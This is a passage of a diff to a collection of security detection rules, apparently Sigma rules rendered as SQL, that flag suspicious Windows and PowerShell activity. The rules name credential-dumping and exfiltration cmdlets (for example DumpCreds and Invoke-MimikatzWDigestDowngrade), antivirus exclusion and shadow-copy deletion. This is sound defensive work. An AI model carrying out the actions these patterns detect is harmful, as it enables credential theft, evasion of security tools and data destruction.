"title": "Suspicious Eventlog Clear", - "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "title": "Powershell Defender Exclusion", + "id": "17769c90-230e-488b-a463-e05c08e9d48f", "status": "experimental", - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.001" + "attack.t1562.001" ], "falsepositives": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_clear_eventlog.yml" + "filename": "proc_creation_win_powershell_defender_exclusion.yml" }, { - "title": "PowerShell ICMP Exfiltration", - "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "status": "test", - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "status": "experimental", + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" ], - "filename": "posh_ps_icmp_exfiltration.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Testing Usage of Uncommonly Used Port", - "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "status": "test", - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "author": "frack113", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative script" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_test_netconnection.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", + "status": "experimental", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Powershell Create Scheduled Task", - "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "status": "test", - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "author": "frack113", + "title": "Download Arbitrary Files Via MSOHTMED.EXE", + "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "status": "experimental", + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_cmdlet_scheduled_task.yml" + "filename": "proc_creation_win_lolbin_msohtmed_download.yml" }, { - "title": "Root Certificate Installed - PowerShell", - "id": "42821614-9264-4761-acfc-5772c3286f76", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "New User Created Via Net.EXE", + "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "status": "test", + "description": "Identifies the creation of local users via the net.exe command.", + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" ], - "filename": "posh_ps_root_certificate_installed.yml" + "filename": "proc_creation_win_net_user_add.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Clear PowerShell History - PowerShell", - "id": "26b692dc-1722-49b2-b496-a8258aa6371d", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1070.003" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_clear_powershell_history.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\' OR NewProcessName LIKE '%.scr' ESCAPE '\\')) AND NOT ((NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\'))) AND NOT ((NewProcessName IN ('-', '')) OR (NewProcessName = '') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Hyper-V Cmdlets", - "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "title": "New Kernel Driver Via SC.EXE", + "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", "status": "experimental", - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "author": "frack113", + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.006" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare legitimate installation of kernel drivers via sc.exe" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_hyper_v_condlet.yml" + "filename": "proc_creation_win_sc_new_kernel_driver.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsScript", - "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": 